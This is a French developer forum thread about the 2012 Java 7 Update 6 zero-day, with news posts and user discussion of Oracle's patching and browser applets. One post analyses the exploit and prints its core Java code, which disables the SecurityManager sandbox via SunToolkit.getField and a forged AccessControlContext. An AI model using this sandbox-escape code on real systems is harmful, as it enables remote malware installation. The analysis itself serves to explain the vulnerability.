Publicité
+ Répondre à la discussion Actualité déjà publiée
Page 1 sur 5 12345 DernièreDernière
Affichage des résultats 1 à 20 sur 90
  1. #1
    Responsable Actualités

    Avatar de Hinault Romaric
    Homme Profil pro Hinault Romaric
    Consultant
    Inscrit en
    janvier 2007
    Messages
    3 909
    Détails du profil
    Informations personnelles :
    Nom : Homme Hinault Romaric
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Consultant
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : janvier 2007
    Messages : 3 909
    Points : 57 512
    Points
    57 512

    Par défaut Faille de sécurité critique dans Java 7 Update 6

    Faille de sécurité critique dans Java 7 Update 6
    pouvant être utilisée pour installer des malwares, la désactivation de la plateforme recommandée


    Les experts en sécurité tirent la sonnette d’alarme pour la dernière version de la plateforme Java. Java 7 Update 6 serait sujet à une vulnérabilité activement exploitée.

    Les chercheurs en sécurité du cabinet FireEye ont découvert une faille de sécurité dans la plateforme pouvant être exploitée pour infecter des ordinateurs avec des logiciels malveillants. La vulnérabilité aurait été utilisée pour installer à distance le cheval de Troie Poison Ivy, qui a été utilisé dans le passé dans de nombreuses campagnes de cyberespionnage.

    Les experts en sécurité ont classé cette vulnérabilité comme extrêmement critique, car elle permet l’exécution de code arbitraire sur les systèmes vulnérables sans l’intervention de l’utilisateur.

    Les risques d’attaques par des pirates sont élevés d’autant plus qu’une preuve de faisabilité (PoC) aurait déjà été publiée sur Internet. Le PoC aurait même été utilisé pour créer un autre exploit pour une utilisation avec le Framework de test populaire Metasploit.

    L’exploit pour Metasploit a été testé avec succès sur la mise à jour Java 7 Update 6, en utilisant différents navigateurs et systèmes d’exploitation dont Firefox sur Ubuntu 10.04, Internet Explorer, Chrome et Firefox sur Windows XP, Vista et Windows 7, Firefox et Safari sur Mac OS X 10.7.4.

    Oracle n’a pas encore publié de commentaire concernant cette faille ou annoncé une date pour la sortie d’un correctif de sécurité. Selon le calendrier de l’éditeur, une mise à jour de la plateforme Java est prévue pour mi-octobre.

    Pour l’instant, il est vivement conseillé aux utilisateurs de cette version de Java de désactiver complètement la plateforme, jusqu’à ce qu’un correctif soit disponible.

    La vulnérabilité affecte uniquement le JRE (Java Runtime Environment) 1.7 qui contient Java 7 Update 6. Les versions 1.6 et antérieures du JRE ne sont pas concernées.


    Source : Secunia, FireEye, Rapid7


    Et vous ?

    Utilisez-vous Java 7 Update 6 ? Que pensez-vous de cette faille ?
    Si déboguer est l’art de corriger les bugs, alors programmer est l’art d’en faire
    Mon blog Mes articles
    En posant correctement votre problème, on trouve la moitié de la solution

  2. #2
    Expert Confirmé Sénior
    Avatar de tchize_
    Homme Profil pro
    Responsable de service informatique
    Inscrit en
    avril 2007
    Messages
    21 597
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 35
    Localisation : Belgique

    Informations professionnelles :
    Activité : Responsable de service informatique
    Secteur : Service public

    Informations forums :
    Inscription : avril 2007
    Messages : 21 597
    Points : 38 488
    Points
    38 488

    Par défaut

    mi-octobre, y a pas a dire, toujours aussi rapide sur les patchs de sécurité chez oracle


    Il serait peut-être utile de préciser que le problème est lié aux applets. Il ne faut pas virer non plus complètement java de sa machine, juste désactiver applets et, je suppose, webstart.
    Tchize (Чиз) faq java, cours java, javadoc. Pensez à et
    Laisse entrer le jour après une nuit sombre. Si tu es toujours là, tu n'es pas faite pour mourir.

  3. #3
    Membre habitué
    Homme Profil pro
    Étudiant
    Inscrit en
    juin 2012
    Messages
    111
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Étudiant
    Secteur : Industrie

    Informations forums :
    Inscription : juin 2012
    Messages : 111
    Points : 134
    Points
    134

    Par défaut

    Bon, heureusement je suis encore en java update 5.

    Mais si j'avais eu la proposition de maj avant de voir cette information, j'aurais sans doute validé cette maj...

    Mi-octobre alors qu'une énorme faille est signalé, faut quand même pas abusé là...

  4. #4
    Membre confirmé Avatar de Crazyfaboo
    Homme Profil pro
    Software Engineer
    Inscrit en
    août 2004
    Messages
    90
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 26
    Localisation : France, Haute Garonne (Midi Pyrénées)

    Informations professionnelles :
    Activité : Software Engineer

    Informations forums :
    Inscription : août 2004
    Messages : 90
    Points : 243
    Points
    243

    Par défaut

    Citation Envoyé par tchize_ Voir le message
    mi-octobre, y a pas a dire, toujours aussi rapide sur les patchs de sécurité chez oracle
    Microsoft fait normalement une MAJ le Mardi toutes les deux semaines... C'est mieux, certes, mais ils ont également beaucoup plus de choses à mettre à jour...

    Citation Envoyé par Dynamès
    Mi-octobre alors qu'une énorme faille est signalé, faut quand même pas abusé là...
    +
    Citation Envoyé par Hinault Romaric
    Oracle n’a pas encore publié de commentaire concernant cette faille ou annoncé une date pour la sortie d’un correctif de sécurité.
    Ca veut juste dire qu'Oracle n'a pas répondu. Rien ne dit qu'il n'y aura pas un patch d'urgence si cette faille est aussi critique que ce qu'il y parait.
    Microsoft a déjà cassé plusieurs fois son calendrier pour publier des patchs critiques. J'espère qu'Oracle le fera aussi. Pour l'instant, on ne sait tout simplement pas. A noter qu'Oracle a déjà fait des Critical Patch update il y a peu de temps...

    Citation Envoyé par Dynamès
    Bon, heureusement je suis encore en java update 5.
    Pas sûr. La faille peut avoir été découverte pour l'update 6 et non testée encore pour l'update 5...

  5. #5
    Membre habitué
    Homme Profil pro
    Étudiant
    Inscrit en
    juin 2012
    Messages
    111
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Étudiant
    Secteur : Industrie

    Informations forums :
    Inscription : juin 2012
    Messages : 111
    Points : 134
    Points
    134

    Par défaut

    Pas sûr. La faille peut avoir été découverte pour l'update 6 et non testée encore pour l'update 5...
    Oui, mais ayant découvert cette faille pour l'update 6, ils ont surement voulu savoir ce qu'il en était pour les update précédents avant de dire"telle et telle version est vulnérable" non?

    Ca veut juste dire qu'Oracle n'a pas répondu. Rien ne dit qu'il n'y aura pas un patch d'urgence si cette faille est aussi critique que ce qu'il y parait.
    Microsoft a déjà cassé plusieurs fois son calendrier pour publier des patchs critiques. J'espère qu'Oracle le fera aussi. Pour l'instant, on ne sait tout simplement pas. A noter qu'Oracle a déjà fait des Critical Patch update il y a peu de temps...
    Oui c'est vrai tu as raison de me le faire remarquer. N'allons pas trop vite en besogne en ce qui concerne les réactions d'oracle.

  6. #6
    Expert Confirmé Sénior Avatar de Uther
    Homme Profil pro
    Inscrit en
    avril 2002
    Messages
    3 063
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations forums :
    Inscription : avril 2002
    Messages : 3 063
    Points : 6 703
    Points
    6 703

    Par défaut

    Citation Envoyé par tchize_ Voir le message
    mi-octobre, y a pas a dire, toujours aussi rapide sur les patchs de sécurité chez oracle
    Il s'agit du calendrier planifié des mises à jour. Vu la gravité de la faille, ça m'étonnerait qu'il attendent jusque là pour faire un correctif.

  7. #7
    Membre confirmé Avatar de Crazyfaboo
    Homme Profil pro
    Software Engineer
    Inscrit en
    août 2004
    Messages
    90
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 26
    Localisation : France, Haute Garonne (Midi Pyrénées)

    Informations professionnelles :
    Activité : Software Engineer

    Informations forums :
    Inscription : août 2004
    Messages : 90
    Points : 243
    Points
    243

    Par défaut

    Citation Envoyé par Dynamès Voir le message
    Oui, mais ayant découvert cette faille pour l'update 6, ils ont surement voulu savoir ce qu'il en était pour les update précédents avant de dire"telle et telle version est vulnérable" non?
    On peut supposer que oui... mais encore une fois, pas sûr tant que c'est pas écrit quelque part noir sur blanc (ou rouge sur noir, vert sur marron, peu importe ^^).

    Le plus simple serait que tu testes ta version de Java 7 (u5 donc) avec metasploit. Là, on serait vraiment fixé !

  8. #8
    Membre chevronné Avatar de JoeChip
    Inscrit en
    septembre 2008
    Messages
    538
    Détails du profil
    Informations forums :
    Inscription : septembre 2008
    Messages : 538
    Points : 749
    Points
    749

    Par défaut

    Sinon en principe, si on n'exécute pas des trucs suspects, et qu'on ne compte pas uniquement sur la sécurité de la JVM, le risque semble limité non ? Enfin, je veux dire, comme d'hab quoi ...?
    Sans danger si utilisé conformément au mode d'emploi.

    (anciennement BenWillard, enfin moins anciennement que ... enfin bon c'est une longue histoire... Un genre de voyage dans le temps...)

  9. #9
    Expert Confirmé Sénior
    Avatar de tchize_
    Homme Profil pro
    Responsable de service informatique
    Inscrit en
    avril 2007
    Messages
    21 597
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 35
    Localisation : Belgique

    Informations professionnelles :
    Activité : Responsable de service informatique
    Secteur : Service public

    Informations forums :
    Inscription : avril 2007
    Messages : 21 597
    Points : 38 488
    Points
    38 488

    Par défaut

    en gros avec cette faille, si j'ai bien compris, une applet est aussi sure qu'un activex sous internet explorer
    Tchize (Чиз) faq java, cours java, javadoc. Pensez à et
    Laisse entrer le jour après une nuit sombre. Si tu es toujours là, tu n'es pas faite pour mourir.

  10. #10
    Membre éprouvé Avatar de rt15
    Homme Profil pro
    Développeur informatique
    Inscrit en
    octobre 2005
    Messages
    208
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 30
    Localisation : France, Savoie (Rhône Alpes)

    Informations professionnelles :
    Activité : Développeur informatique

    Informations forums :
    Inscription : octobre 2005
    Messages : 208
    Points : 440
    Points
    440

    Par défaut

    Citation Envoyé par JoeChip Voir le message
    Sinon en principe, si on n'exécute pas des trucs suspects, et qu'on ne compte pas uniquement sur la sécurité de la JVM, le risque semble limité non ? Enfin, je veux dire, comme d'hab quoi ...?
    Le problème avec ces fichus applets est qu'ils ont une fâcheuse tendance à être exécutés par le navigateur, qui ne demande pas forcément confirmation avant de le faire. Ça dépend du navigateur et de sa configuration, mais par défaut ils ont plutôt tendance à autoriser.

    Par exemple, si vous allez sur cette page et que vous finissez par voire une tête sur fond jaune et deux boutons, après un temps de chargement certain et un peu honteux pour ce que c'est...
    Ça veut dire que votre navigateur exécute les applets (Tout du moins ceux qui ne demandent pas de droits supplémentaires, tel que l'accès au disque) sans rien vous demander !

    Et là il suffit d'aller sur une page web avec un applet qui exploite la faille, si vous avez java avec la faille correspondante, vous êtes mort.

    Perso, je crois avoir été infecté 3 fois, et ce a priori une fois par un ActiveX (Dont j'ai autorisé l'exécution), et deux fois par des applets (Qui se sont exécutés sans que je demande rien. La petite icône java apparaît dans la barre de notification, le PC rame un peu... Bingo t'es infecté. La pub en rafale va pas tarder !)

    Donc si vous surfez dans des zones pas très clean... Désactivez java dans le navigateur ! Java ça sert quasi jamais sur le web de toute façon.

    [edit]
    Surtout que les failles java c'est très à la mode, voire ici ou .

  11. #11
    Expert Confirmé Sénior
    Avatar de tchize_
    Homme Profil pro
    Responsable de service informatique
    Inscrit en
    avril 2007
    Messages
    21 597
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 35
    Localisation : Belgique

    Informations professionnelles :
    Activité : Responsable de service informatique
    Secteur : Service public

    Informations forums :
    Inscription : avril 2007
    Messages : 21 597
    Points : 38 488
    Points
    38 488

    Par défaut

    personellement, avec la part de marché des applets, avec le peu de succès de javafx (j'ai vu plus de sites en sivlerlight qu'en javafx, c'est tout dire) et vu comment c'est toujours aussi rapide à charger ces bousins, je me demande franchement si la politique d'oracle ne s'oriente pas vers l'option "laissons pourir les applets jusqu'à ce que tout le monde aie oublié leur existance et puis supprimons le support"
    Tchize (Чиз) faq java, cours java, javadoc. Pensez à et
    Laisse entrer le jour après une nuit sombre. Si tu es toujours là, tu n'es pas faite pour mourir.

  12. #12
    Membre éprouvé
    Inscrit en
    juin 2006
    Messages
    350
    Détails du profil
    Informations forums :
    Inscription : juin 2006
    Messages : 350
    Points : 404
    Points
    404

    Par défaut

    A les fumiers de journalistes ! Ils sont tous donnés le mot, les principaux portails liés aux technologies bombardent avec des titres genre :
    "Désinstaller Java est fortement recommandé‎"
    "Java : alerte à la faille O day exploitée"
    "Les Mac sous la menace d'une dangereuse faille zéro-day dans Java"

    Quand il y a une faille dans chrome ou firefox on demande pas aux utilisateurs de désinstallés leur navigateur ou de ne plus l'utiliser...

    Avec un pub pareil JavaFx est super bien parti Le taux de pénétration est pas près de s'envoler.

    Je ne comprend pas trop cette haine des plugins et l'émerveillement devant le javascript. Ce vieux langage pourris des années 90 que personne voulait utiliser.
    Toutes ces années de recherches sur les Langages pour finalement imposer Javascript comme langage universel

  13. #13
    Expert Confirmé Sénior
    Avatar de tchize_
    Homme Profil pro
    Responsable de service informatique
    Inscrit en
    avril 2007
    Messages
    21 597
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 35
    Localisation : Belgique

    Informations professionnelles :
    Activité : Responsable de service informatique
    Secteur : Service public

    Informations forums :
    Inscription : avril 2007
    Messages : 21 597
    Points : 38 488
    Points
    38 488

    Par défaut

    Le poids de l'histoire.

    En ce qui me concerne, java fx, c'est mort et enterré
    Tchize (Чиз) faq java, cours java, javadoc. Pensez à et
    Laisse entrer le jour après une nuit sombre. Si tu es toujours là, tu n'es pas faite pour mourir.

  14. #14
    Membre éprouvé Avatar de rt15
    Homme Profil pro
    Développeur informatique
    Inscrit en
    octobre 2005
    Messages
    208
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 30
    Localisation : France, Savoie (Rhône Alpes)

    Informations professionnelles :
    Activité : Développeur informatique

    Informations forums :
    Inscription : octobre 2005
    Messages : 208
    Points : 440
    Points
    440

    Par défaut

    Mais lol, effectivement. On tombe sur ce genre de phrases :
    En attendant, si vous n’en avez pas besoin, il est tout simplement recommandé de désinstaller Java 1.7.
    J'imagine les geeks en train se jeter sur la désinstallation de java : "Hop hop je vire ce truc, veut pas me faire pirater la gueule moi. Je sais pas à quoi ça sert de toute façon.". Peuvent pas deviner que cette faille n'est intéressante que pour les applets. Une appli java n'a absolument pas besoin de faille pour mettre en place un trojan ou autre backdoor.

    [troll]
    Du coup toutes leurs super applications desktop java vont plus marcher... Nan mais attendez c'est bon, ils en avaient pas !
    [/troll]

  15. #15
    Expert Confirmé Sénior
    Avatar de tchize_
    Homme Profil pro
    Responsable de service informatique
    Inscrit en
    avril 2007
    Messages
    21 597
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 35
    Localisation : Belgique

    Informations professionnelles :
    Activité : Responsable de service informatique
    Secteur : Service public

    Informations forums :
    Inscription : avril 2007
    Messages : 21 597
    Points : 38 488
    Points
    38 488

    Par défaut

    Citation Envoyé par rt15 Voir le message
    [troll]
    Du coup toutes leurs super applications desktop java vont plus marcher... Nan mais attendez c'est bon, ils en avaient pas !
    [/troll]
    Tu semble oublier azureus, qui a une part de marché non négligeable chez les accros aux bit torrent
    Tchize (Чиз) faq java, cours java, javadoc. Pensez à et
    Laisse entrer le jour après une nuit sombre. Si tu es toujours là, tu n'es pas faite pour mourir.

  16. #16
    Chroniqueur Actualités

    Homme Profil pro Tarik Zakaria Benmerar
    CEO
    Inscrit en
    juillet 2012
    Messages
    78
    Détails du profil
    Informations personnelles :
    Nom : Homme Tarik Zakaria Benmerar
    Localisation : Algérie

    Informations professionnelles :
    Activité : CEO
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : juillet 2012
    Messages : 78
    Points : 1 351
    Points
    1 351

    Par défaut Le nouvel exploit zero-day de Java 7 décortiqué

    Le nouvel exploit zero-day de Java 7 décortiqué
    Il permet de désactiver le sandbox avec une facilité déconcertante


    Le grave exploit 0Day révélé au grand jour ce week-end (lire ci-devant) fait l'objet d'analyses approfondies de la part d'experts en sécurité.

    L'analyse de Michael Schierl, traqueur récidiviste de vulnérabilités Java, met l'index sur une faille de sécurité dans l'implémentation de la méthode .execute() de la classe Expression. L'exploit n'utilise en aucun cas du bytecode, il n'est, en somme, pas très sophistiqué, mais reste difficile à détecter.

    L'exploit utilise la classe sun.awt.SunToolkit pour désactiver le SecurityManager et par conséquent le sandbox de Java. Il ouvre ainsi le champ vers une liberté totale sur le système.

    Pour mieux comprendre, il faut savoir que cette classe propose une méthode nommée getField(), qui donne accès, en lecture et écriture, aux attributs privés d'autres classes.

    En principe, un code ne peut accéder à ces attributs, mais la nouvelle méthode .execute() de la classe Expression introduite dans Java 7 souffre d'un bug, qui expose dangereusement la méthode getField(). Dès lors, un code pareil peut faire des ravages :


    Code :
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    private void SetField(Class paramClass, 
                          String paramString,
                          Object paramObject1, 
                          Object paramObject2) throws Throwable
    { 
      Object arrayOfObject  = new Object[2]; 
      arrayOfObject[0] = paramClass;
      arrayOfObject[1] = paramString;
      Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"),
                                                      "getField", arrayOfObject);
      localExpression.execute();
      ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }
    À partir de ce bout de code, on peut désactiver le sandbox en appelant System.setSecurityManager(null). Pour cela, l'exploit crée un objet Statement pour appeler cette méthode.

    Néanmoins, un appel direct n'est pas permis, et sera considéré comme non sûr.
    Pour contourner cette restriction, un objet AccessControlContext est créé en premier qui représente en fait une classe démarrée à partir du disque dur local, et bénéficie ainsi de tous les droits d'accès.

    Code :
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    public void disableSecurity() 
        throws Throwable 
    { 
      Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]); 
      Permissions localPermissions = new Permissions(); 
      localPermissions.add(new AllPermission()); 
      ProtectionDomain localProtectionDomain = new ProtectionDomain( 
        new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions); 
      AccessControlContext localAccessControlContext = 
        new AccessControlContext(new ProtectionDomain{localProtectionDomain}); 
      SetField(Statement.class, "acc", localStatement, localAccessControlContext); 
      localStatement.execute(); 
    }
    Oracle n'a pas encore annoncé la sortie d'un correctif. Java 7 Update 6 est la dernière version téléchargeable. Toutes les mises à jour de Java 7 souffrent de cette même vulnérabilité.

    Ainsi, on préconise de carrément désactiver le plug-in Java du navigateur, sous peine, d'ouvrir une brèche que des malwares n'hésiteront pas à exploiter.

    Source : le code de l'exploit

    Et vous ?

    Oracle réagira-t-il assez vite pour éviter une catastrophe virale ?
    Quel est le vrai potentiel d'un tel exploit ?
    Les IDS et les antivirus seront-ils suffisants ?

  17. #17
    Expert Confirmé Sénior
    Avatar de tchize_
    Homme Profil pro
    Responsable de service informatique
    Inscrit en
    avril 2007
    Messages
    21 597
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 35
    Localisation : Belgique

    Informations professionnelles :
    Activité : Responsable de service informatique
    Secteur : Service public

    Informations forums :
    Inscription : avril 2007
    Messages : 21 597
    Points : 38 488
    Points
    38 488

    Par défaut

    a pleurer. En gros on a un securityManager, et derrière on a awt, qui a des droits privilégiés sur le securitymanager, et qui en fait profiter celui qui veux
    Tchize (Чиз) faq java, cours java, javadoc. Pensez à et
    Laisse entrer le jour après une nuit sombre. Si tu es toujours là, tu n'es pas faite pour mourir.

  18. #18
    Membre confirmé Avatar de Crazyfaboo
    Homme Profil pro
    Software Engineer
    Inscrit en
    août 2004
    Messages
    90
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 26
    Localisation : France, Haute Garonne (Midi Pyrénées)

    Informations professionnelles :
    Activité : Software Engineer

    Informations forums :
    Inscription : août 2004
    Messages : 90
    Points : 243
    Points
    243

    Par défaut


    WTF (Ouate 2 phoque) !!!
    Juste… sur le cul… !!

  19. #19
    Rédacteur/Modérateur
    Avatar de andry.aime
    Homme Profil pro Andry Aimé
    Inscrit en
    septembre 2007
    Messages
    7 097
    Détails du profil
    Informations personnelles :
    Nom : Homme Andry Aimé
    Localisation : Ile Maurice

    Informations forums :
    Inscription : septembre 2007
    Messages : 7 097
    Points : 12 005
    Points
    12 005

    Par défaut

    localPermissions.add(new AllPermission());
    Citation Envoyé par Eric Cartman
    ça troue le ***
    Citation Envoyé par tchize_ Voir le message
    En ce qui me concerne, java fx, c'est mort et enterré
    Non, c'est un zombie .

  20. #20
    Expert Confirmé
    Avatar de pmithrandir
    Homme Profil pro Pierre Bonneau
    Développeur Web
    Inscrit en
    mai 2004
    Messages
    1 628
    Détails du profil
    Informations personnelles :
    Nom : Homme Pierre Bonneau
    Âge : 31
    Localisation : Roumanie

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : Communication - Médias

    Informations forums :
    Inscription : mai 2004
    Messages : 1 628
    Points : 3 373
    Points
    3 373

    Par défaut

    tient, grace a ca, je viens de m'apercevoir que le bouton disable java de la barre webdeveloper ne fonctionne pas je vois le smiley même quand java est sencé être desactivé.

Liens sociaux

Règles de messages

  • Vous ne pouvez pas créer de nouvelles discussions
  • Vous ne pouvez pas envoyer des réponses
  • Vous ne pouvez pas envoyer des pièces jointes
  • Vous ne pouvez pas modifier vos messages
  •